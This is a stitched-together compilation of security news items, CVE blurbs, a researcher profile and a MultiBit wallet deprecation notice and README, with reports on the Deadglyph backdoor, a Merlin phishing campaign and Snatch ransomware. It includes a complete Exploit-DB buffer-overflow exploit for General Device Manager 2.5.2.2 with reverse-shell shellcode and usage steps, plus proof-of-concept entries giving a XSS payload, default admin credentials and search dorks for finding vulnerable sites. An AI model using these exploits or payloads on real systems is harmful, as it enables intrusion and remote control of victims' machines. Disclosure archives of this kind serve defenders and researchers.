Docker Desktop before 4.23.0 allows Access Token theft via a crafted extension icon URL.

This issue affects Docker Desktop: before 4.23.0.



CVE-2023-5166: Docker Desktop release notes

By Waqas
Stealth Falcon APT group is notorious for its cyber-espionage campaigns in the Middle East.
This is a post from HackRead.com Read the original post: Deadglyph: A New Backdoor Linked to Stealth Falcon APT in the Middle East

ESET warns that Deadglyph is a highly sophisticated backdoor that is mixed with different programming languages to add an extra layer of complexity.

The Middle East has once again found itself in the crosshairs of a new cybersecurity threat. Recent findings by experts at ESET Research have unveiled a highly sophisticated and previously unknown cyber-espionage tool they’ve dubbed “Deadglyph.”

This discovery is a significant development in the world of cybersecurity, as it’s the first time this secretive threat has been publicly analyzed. Even more concerning, Deadglyph has been traced back to the Stealth Falcon APT group, notorious for its cyber-espionage campaigns in the Middle East.

****What is Deadglyph?****

Deadglyph gets its name from distinctive artifacts found within the malicious software. These artifacts, such as “0xDEADB001,” and the use of homoglyph attacks (where similar-looking characters replace regular ones) indicate a high level of sophistication behind its design. It’s important to note that this isn’t your typical cyber threat; it’s a highly advanced and covert tool.

****Unusual Architecture Raises Concerns****

One of the standout features of Deadglyph is its unique architecture. Unlike most malware that relies on a single programming language, Deadglyph uses a combination of two: an x64 binary and a .NET assembly. This is quite unusual and suggests that the creators went to great lengths to make it harder to analyze. Mixing different programming languages also adds an extra layer of complexity.

What sets Deadglyph apart is that it doesn’t come with pre-set commands like traditional malware. Instead, it fetches its instructions from a remote server, giving it a flexible and adaptable nature.

****The Stealth Falcon APT Group****

The experts at ESET Research have connected Deadglyph to the Stealth Falcon APT group. This group has been active since 2012 and is believed to have ties to the United Arab Emirates. Its primary targets include political activists, journalists, and dissidents in the Middle East. The group’s activities were first exposed by Citizen Lab in 2016.

There are suggestions that Stealth Falcon and another group called Project Raven are one and the same, as they seem to have overlapping targets and tactics. The revelation of Deadglyph adds another layer of complexity to this enigmatic group’s toolkit.

****Breaking Down Deadglyph’s Operation****

Deadglyph’s operation is a complex chain of events. It starts with a registry shellcode loader that’s used to load shellcode from the Windows registry. This shellcode, in turn, loads the main part of Deadglyph, known as the Executor. What’s unique is that only the initial loader exists as a file on the victim’s computer; the rest remains encrypted within a registry entry.

While the exact method of infection isn’t clear, it’s suspected that an installer component plays a role in getting the malicious code onto a victim’s system.

****The Role of the Orchestrator****

The Orchestrator, written in .NET, is the central component of Deadglyph. Its primary job is to communicate with a remote server and execute commands, often with the help of the Executor. The Orchestrator is highly obfuscated, making it even more challenging to analyze. In essence, it acts as the control center for Deadglyph’s operations.

****Communication and Commands****

According to ESET’s report, Deadglyph uses two embedded modules, Timer and Network, for communication with its remote server. These modules are obfuscated as well. The Timer module executes tasks at set intervals, while the Network module handles communication with the server. Deadglyph also has the ability to uninstall itself if it loses contact with the server for an extended period.

****Modules: The Heart of Deadglyph****

Deadglyph’s core capabilities are delivered through additional modules obtained from the server. ESET researchers managed to obtain three such modules, shedding light on Deadglyph’s potential. However, it’s believed that there could be as many as fourteen modules in total, each adding unique functionality.

*   **Process Creator (Module 0x69)**: This module can execute specific commands as new processes and provide the results back to Deadglyph’s control center.
*   **Info Collector (Module 0x6C)**: This module gathers extensive information about the infected system, including operating system details, installed software, network adapters, and more.
*   **File Reader (Module 0x64)**: This module reads specified files and shares their contents, with an option to delete the files afterward.

****Multistage Shellcode Downloader Chain****

While investigating Deadglyph, ESET researchers stumbled upon a complex multistage shellcode downloader chain. This chain is believed to be used in the installation process of Deadglyph and shares similarities with the main threat.

The chain involves multiple stages, starting with a CPL file designed to download shellcode. This shellcode is then injected into a host process, ultimately leading to the loading of a .NET assembly that serves as a shellcode downloader.

****In Conclusion: A Disturbingly Complex Threat****

The discovery of Deadglyph shines a spotlight on the ever-evolving tactics of APT groups, particularly those targeting the Middle East. Its intricate architecture, dynamic modules, and counter-detection mechanisms make it a formidable digital threat. Organizations and individuals in the region need to remain vigilant and ensure their cybersecurity measures are up to the task of defending against such advanced threats.

****RELATED ARTICLES****

Chinese APT Flax Typhoon uses legit tools for cyber espionage

Chinese APT Slid Fake Signal, Telegram Apps onto Official App Stores

Deadglyph: A New Backdoor Linked to Stealth Falcon APT in the Middle East

General Device Manager 2.5.2.2 is vulnerable to Buffer Overflow.

    # Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
    # Date: 30.07.2023
    # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
    # Software Link 2:
    https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
    # Exploit Author: Ahmet Ümit BAYRAM
    # Tested Version: 2.5.2.2
    # Tested on: Windows 10 64bit
    
    # 1.- Run python code : exploit.py
    # 2.- Open pwned.txt and copy all content to clipboard
    # 3.- Open Device Manage and press Add Device
    # 4.- Paste the content of pwned.txt into the 'IP Address'
    # 5.- Click 'OK'
    # 6.- nc.exe local IP Port 1337 and you will have a bind shell
    # 7.- R.I.P. Condor <3
    
    import struct
    
    offset = b"A" * 1308
    
    nseh = b"\xEB\x06\x90\x90" # jmp short
    
    seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
    
    
    nops = b"\x90" * 32 
    
    #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
    
    shellcode =  b""
    shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
    shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
    shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
    shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
    shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
    shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
    shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
    shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
    shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
    shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
    shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
    shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
    shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
    shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
    shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
    shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
    shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
    shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
    shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
    shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
    shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
    shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
    shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
    shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
    shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
    shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
    shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
    shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
    shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
    shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
    shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
    
    
    final_payload = offset + nseh + seh + nops + shellcode
    
    # write the final payload to a file
    try:
        with open('pwned.txt', 'wb') as f:
            print("[+] Creating %s bytes evil payload..." %len(final_payload))
            f.write(final_payload)
            f.close()
            print("[+] File created!")
    except:
        print("File cannot be created!")

CVE-2023-43131: OffSec’s Exploit Database Archive

LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

LogoBee CMS 0.2 Cross Site Scripting

Lamano LMS version 0.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lamano LMS v0.1 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.lamano.lu/                                                                                              |  | # Dork      :  © 2018 Lamano by easysolutions                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] Use payload : user = admin & Pass : 1234[+] https://www.sylviebecker127.0.0.1luGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Lamano LMS 0.1 Insecure Settings

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.
"Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.

"Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

The cybersecurity company is tracking the campaign under the name **STARK#VORTEX**.

The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary.

The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.

"While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection," the researchers said.

This is the first time Ukrainian government organizations have been targeted using Merlin. In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employs CHM files as decoys to infect the computers with the open-source tool.

CERT-UA attributed the intrusions to a threat actor it monitors under the name UAC-0154.

"Files and documents used in the attack chain are very capable of bypassing defenses," the researchers explained.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

"Typically receiving a Microsoft help file over the internet would be considered unusual. However, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to appear in a help-themed document or file."

The development arrives weeks after the CERT-UA said it detected an unsuccessful cyber attack against an unnamed critical energy infrastructure facility in the country undertaken by the Russian state-sponsored crew called APT28.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Fun facts about Rocco:
Microsoft MVR: Rocco is a 2023 Microsoft Most Valuable Researcher.
Fitness fanatic: Inspired by old-school body building and countless hours of chopping and carrying wood in the mountains during his youth, Rocco remains a fitness enthusiast, setting himself challenges and pushing his limits.
Old-school cinema enthusiast: Rocco’s favorite movies are the “Rocky” series, especially “Rocky 2,” and he also has a deep appreciation for the mafia film series “The Godfather.

**Fun facts about Rocco:**

**Microsoft MVR:** Rocco is a 2023 Microsoft Most Valuable Researcher.

**Fitness fanatic:** Inspired by old-school body building and countless hours of chopping and carrying wood in the mountains during his youth, Rocco remains a fitness enthusiast, setting himself challenges and pushing his limits.

**Old-school cinema enthusiast**: Rocco’s favorite movies are the “Rocky” series, especially “Rocky 2,” and he also has a deep appreciation for the mafia film series “The Godfather."

**Travel trailblazer**: Rocco’s passport boasts stamps from over 25 countries. From the historic streets of Prague to the bustling cities of South Korea, Rocco’s work has taken him around the world.

Rocco’s journey into the world of computers and hacking began during his childhood, in an old-school Italian household in Australia. Embracing the traditions and warmth of family time, Rocco spent a lot of time at home, providing the opportunity to explore the digital realm.

In his early school years, around Grades 3 and 4, Rocco stumbled upon IRC, a popular chat program of the era, which connected him to fellow hackers. By Grades 4 and 5, his nascent skill manifested when he unintentionally exploited his primary school’s system using an old “Cain and Abel” tool and CVE-2000-0884. These flaws saw young Rocco accessing confidential school data, which drew the school’s attention in a memorable assembly. 

Rocco eventually finished university and discovered an online offensive security course in 2009, which acted as a catalyst, further reinforcing his passion. But what truly opened his eyes to the potential of this field was a security breach at his family’s business. By his early 20s, Rocco was entrenched in the world of hacking. He became a prominent member of a hacking group Corelan Team, where he specialized in writing Windows and web exploits and integrating them into the Metasploit framework. At the time, Rocco didn’t realize how cutting edge this work was, and assumed everyone else was doing similar work.

Rocco’s experience set the stage for a thriving career in Melbourne, Australia, where he landed a job in a leading consulting firm, working his way up to senior penetration tester for BAE Systems Applied Intelligence after an acquisition of the consulting firm. A brief stint at a boutique company led him to lucrative contracting roles, earning 3x more than his previous salary.

Rocco’s journey into the world of vulnerabilities was marked by a fervent obsession with identifying bugs and crafting exploits. To his surprise, this R&D passion quickly turned profitable, with his first monetary award for a bounty coming from ZDI. The fuzzing gained traction, Rocco harnessed its power, identifying significant vulnerabilities in various high-profile software products. This achievement opened doors to collaborate with Microsoft, particularly performing C++ and C# code reviews. He further expanded his skills by undertaking projects at the Mayo Clinic, focusing on medical equipment testing such as infusion pumps to building access controls.

Rocco’s skills caught the interest of a firm based in the United Arab Emirates. Originally planned as a brief stint, Rocco spent seven years in the UAE. Here, he transitioned into management roles, leading both a groundbreaking test and validation software lab and a research center, immersing himself in their pioneering efforts. However, the global changes brought about by the COVID-19 pandemic saw him returning to Australia. This homecoming was marked by a more hands-on technical approach and the creation of his new company named Tec Security, which focuses on vulnerabilities in widely deployed products. Additionally, he has a robust network of hacker friends, specializing in various cyber domains. Together, they harness their collective technical prowess to advance vulnerability research. This collaborative spirit not only showcases his dedication to the craft but also his belief in the collective power of the cybersecurity community.

Rocco’s home is a testament to his passion, with computers populating his entire basement and a hardware hacking lab for his IoT research. Reflecting on his Australian roots, Rocco mentions how the nation’s geographical remoteness inadvertently sheltered him from global perspectives. It was only when he stepped into the professional domain that he realized the cutting-edge nature of his work. This self-driven learning, he believes, was a cornerstone in shaping his expertise.

Rocco’s acumen for assembly language, even before mastering C, equipped him with a distinctive edge in the field. He advocates for simplification in the face of the current information overload, urging aspiring hackers to understand language pitfalls at a granular level.

While his professional life flourished, Rocco’s personal trajectory was shaped by a keen business acumen inherited from his family’s business. If not for the alluring world of hacking, Rocco might have been deep in the family trade.

Rocco remains a force to be reckoned with in the cybersecurity world. While he employs a range of techniques, coverage guided fuzzing remains one of his go-to strategies, especially with binaries and drivers written in C or C++. He has turned his basement into a technophile’s paradise, filled with computers designed for bug hunting. However, it’s not just about his dynamic and static analysis tooling for Rocco; his meticulous approach to old-school manual code review and reverse engineer across multiple platforms including Android. Additionally, his competitive spirit has led him to participate in numerous hacking competitions, consistently ranking high on various leaderboards, setting him apart from many in the field.

Follow Rocco and his company on social media:

Twitter / X:  Rocco Calvi (@TecR0c) / X (twitter.com)

LinkedIn: Rocco Calvi | LinkedIn

Website: TecSecurity.io

Journey Down Under: How Rocco Became Australia’s Premier Hacker

MultiBit HD before 0.1.2 allows attackers to conduct bit-flipping attacks that insert unspendable Bitcoin addresses into the list that MultiBit uses to send fees to the developers. (Attackers cannot realistically steal these fees for themselves.) This occurs because there is no message authentication code (MAC).

**Multibit is Deprecated - Do Not Use**

Wednesday, July 26, 2017

Dear Bitcoin Community,

It is time for us to let Multibit go.

KeepKey acquired Multibit a little over 1 year ago. At the time, the engineers who originally built and supported Multibit had announced that they would no longer be working on it or providing support. Multibit played an important role in the Bitcoin infrastructure. We felt that it was important for Multibit to continue and hoped that with our existing support and development teams, we would be able to keep Multibit alive.

The reality is that Multibit is in need of a lot of work. It has stubborn bugs that have caused us and Multibit users much grief. Additionally, Bitcoin has gone through a fundamental change in regards to the way fees work. The addition of SegWit in the coming weeks will mean the Multibit software has fallen still further behind.

Unfortunately, KeepKey simply does not have the resources to support the current issues, nor to rebuild Multibit to ensure ideal user experience. By focusing our attention on the KeepKey device, we will continue building and improving the best hardware wallet available.

Thus, KeepKey will discontinue support and maintenance of Multibit, effective immediately.

We recommend that all Multibit users discontinue using it and you move your keys to other wallet software of your choosing.

**Next Steps for Multibit Users**

Videos that demonstrate how to move your wallet to Electrum are available on YouTube.

*   Multibit HD: https://youtu.be/E-KcY6KUVnY
*   Multibit Classic: https://youtu.be/LaijbTcxsv8

Please note that the version of Electrum available for download today (version 2.8.3) doesn’t fully support the importing Multibit HD wallet words. The version shown in the Multibit HD video is the soon-to-be-released next version.

Multibit was a fantastic piece of software in its time, and we want to thank the Multibit developers for such an important contribution to Bitcoin’s history.

Sincerely,

Ken Heutmaker

CTO, KeepKey

**Introduction**

MultiBit is a Simplified Payment Verification (SPV) Bitcoin desktop client.

MultiBit is now in maintenance mode as it has largely been replaced by MultiBit HD. To avoid confusion we refer to MultiBit Classic and MultiBit HD to keep them separate.

MultiBit Classic relies on the following technologies:

*   Maven as the build system, so the usual Maven processes apply. If you're not familiar with Maven then download it first and follow their installation instructions.
*   ZXing ("Zebra Crossing") for QR codes
*   Bitcoinj for access to the Bitcoin network
*   Install4j for creating installers for Windows, Mac, Linux
*   Bitcoinj Enforcer Rules to prevent dependency chain attacks
*   XChange for access to several Bitcoin exchanges

**The Bitcoinj "Alice" dependency**

MultiBit Classic depends on a special fork of Bitcoinj for its Bitcoin support. This is due to legacy wallet serialization issues and the MultiBit team are working towards a complete integration through the MultiBit HD project.

While it is possible to build MultiBit Classic using our staging repository you may want to review the modified Bitcoinj library for yourself. You can clone from this fork:

    https://code.google.com/r/jimburton618-bitcoinj-coinbase-tx/source/checkout
    

The branch you should use for the MultiBit master code is: bcj-0.11.2-mb-alice The branch you should use for the MultiBit develop code is: bcj-0.11.2-mb-alice

Once cloned, you should then install the custom Bitcoinj library using

**Branching strategy**

This loosely follows the "master-develop" or "Git flow" pattern.

There are 2 main branches: master and develop. The master branch is exclusively for releases, while the develop is exclusively for release candidates. The develop branch always has a Maven version of develop-SNAPSHOT.

Occasionally a feature branch will be made off develop to cover a long-running issue. This will then be merged back into develop

When develop is ready for release it is subjected to extensive testing (manual and automated). The final act is to update the pom.xml to remove the SNAPSHOT suffix and merge it into master.

The master branch is then tagged with the release number. Tags are in the format v1.2.3 to distinguish them from branch names.

An announcement is made on the MultiBit website and social media (Twitter, Reddit, Bitcointalk etc) to alert everyone that a new version is available.

**Maven build targets**

The important targets are:

After some processing, you will have the following artifacts in the target directory:

*   an executable jar: multibit-exe.jar

**Bitcoin Solutions staff**

Use the Install4j installer in the multibit-installers project to create your Mac/ Win/ Linux installers.

To run MultiBit from these artifacts you can follow the instructions provided on the main MultiBit website

**Custom configuration**

MultiBit Classic is quite flexible and has several features only accessible to power users through the configuration file. This is discussed in more detail in configuration.md

**Contributing**

All contributors must be OK with releasing their work under the MIT license.

CVE-2015-6964: GitHub - Multibit-Legacy/multibit: Deprecated Bitcoin Wallet

Categories: News
Tags: Themebleed

Tags:  zero-days

Tags:  Apple

Tags:  T-Mobile

Tags:  MGM

Tags:  metaverse

A list of topics we covered in the week of September 18 to September 24 of 2023



(Read more...)




The post A week in security (September 18 - September 24) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

For Personal

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

See all

Company

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (September 18 - September 24)

By Waqas
This advisory was published as part of the #StopRansomware initiative.
This is a post from HackRead.com Read the original post: FBI and CISA Issue Joint Advisory on Snatch Ransomware Threat

Snatch ransomware’s victims span various critical infrastructure sectors, including the Defense Industrial Base, Food and Agriculture, and Information Technology sectors.

In an ongoing effort to combat the rising threat of ransomware attacks, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have released a joint Cybersecurity Advisory (CSA) shedding light on the evolving tactics of the Snatch ransomware variant.

This advisory, published as part of the #StopRansomware initiative, aims to equip network defenders with crucial information to protect against this **challenging cyber threat**.

****A Persistent Threat****

The Snatch ransomware variant, which first emerged in 2018, has proven to be a resilient adversary. Operating under a ransomware-as-a-service (**RaaS**) model, Snatch has consistently adapted its tactics to capitalize on the latest trends in cybercrime. Recent FBI investigations have revealed that Snatch has been particularly active, with the most recent activity reported as of June 1, 2023.

One of the hallmark features of Snatch ransomware is its ability to evade detection by rebooting infected devices into Safe Mode, a technique that allows it to operate undetected by **antivirus** or endpoint protection software.

This characteristic, combined with its penchant for data exfiltration and double extortion, makes Snatch a potent threat. After exfiltrating data from victims, Snatch threat actors often resort to double extortion, threatening to publish the stolen data on their extortion blog if the ransom is not paid.

****A Wide Range of Targets****

Snatch ransomware’s victims span various critical infrastructure sectors, including the Defense Industrial Base, Food and Agriculture, and Information Technology sectors. Their modus operandi involves a meticulous approach, spending up to three months on a victim’s system before deploying the ransomware. During this time, they exploit vulnerabilities, move laterally across networks, and search for valuable data to exfiltrate.

A screenshot from Snatch ransomware’s dark web website blog shows its latest alleged victim is the Florida Department of Veterans Affairs (Credit for the screengrab: Hackread.com)

****Unique Tactics****

Snatch’s use of unique tactics sets it apart from other ransomware variants. The ransomware executable is known to append a series of hexadecimal characters to each file and folder name it encrypts, resulting in a unique identifier for each infection.

Additionally, the threat actors communicate with victims through email and the Tox communication platform, based on identifiers left in ransom notes or through their extortion blog.

Commenting on this, **Colin Little**, Security Engineer at Centripetal, told Hackread.com: This CISA advisory is a noteworthy example of several primary challenges in breach prevention.” Colin also pointed out vital steps that businesses and unsuspecting users can take against the growing threat of Snatch ransomware:

*   “The organization of cyber crime in the world today is at unprecedented levels, with uninterrupted access to communications as well as a flourishing economy in which stolen information is a commodity.

*   Several “tried and true” tools upon which threat actors can rely to ensure a complete kill chain, such as Cobalt Strike.

*   The ability to “live off the land” by weaponizing operational and administrative features such as RDP and Windows Safe Mode.

*   Most importantly, the ability to reach across the internet and penetrate the attack surface via remote access tools from fairly obvious high-risk sources, such as a “from a Russian bulletproof hosting service and through other virtual private network (VPN) services.”

“Attack surface protection can provide not only cover and concealment from these types of attacks, but visibility into what the attack surface looks like as well,” Colin emphasized.

****Mitigations and Recommendations****

In their **advisory**, the FBI and CISA have outlined several crucial mitigations and recommendations for organizations to reduce the likelihood and impact of ransomware incidents, based on Snatch’s activity:

*   **Audit and Control Remote Access:** Organizations are advised to audit and control remote access tools, monitor their usage, and require authorized remote access to be used only through approved channels like VPNs.
*   **Implement Application Controls:** Application controls should be put in place to manage and control software execution, including allowing remote access programs to prevent unauthorized installations.
*   **Strengthen Credential Security:** Protect credentials by implementing strong password policies, enforcing multi-factor authentication, and avoiding the storage of plaintext credentials in scripts.
*   **Regularly Update and Patch:** Keep all systems, software, and firmware up-to-date, prioritizing the patching of known exploited vulnerabilities.
*   **Network Segmentation:** Employ network segmentation to limit the spread of ransomware and restrict adversary lateral movement.
*   **Data Backup and Encryption:** Maintain offline backups of data, ensure data backups are encrypted, immutable, and cover the entire organization’s data infrastructure.
*   **Security Testing and Validation:** Continuously test and validate security controls against known threat behaviours, aligning them with MITRE ATT&CK techniques.

****Report Incidents****

Lastly, the FBI and CISA strongly discourage paying ransoms, as it does not guarantee the recovery of files and may encourage further criminal activity. Instead, they urge organizations to promptly report ransomware incidents to the appropriate authorities, such as the FBI’s Internet Crime Complaint Center (IC3) or CISA.

Joint advisories like this one serve as crucial tools for organizations to stay informed and proactively defend against ransomware attacks like Snatch. By implementing the recommended mitigations and sharing threat information, organizations can enhance their cybersecurity posture and contribute to the collective effort to #StopRansomware.

****RELATED ARTICLES****

1.  NSA, CISA Release Guidelines to Secure VPNs
2.  FBI and NCSC Warn of Cyberattacks on US Space Sector
3.  CISA suggests using ad blockers to fend off ‘malvertising’
4.  CISA Publishes List of Free Cybersecurity Tools and Services
5.  CISA – Ransomware Hit SCADA systems of 3 US water facilities

Tag

#windows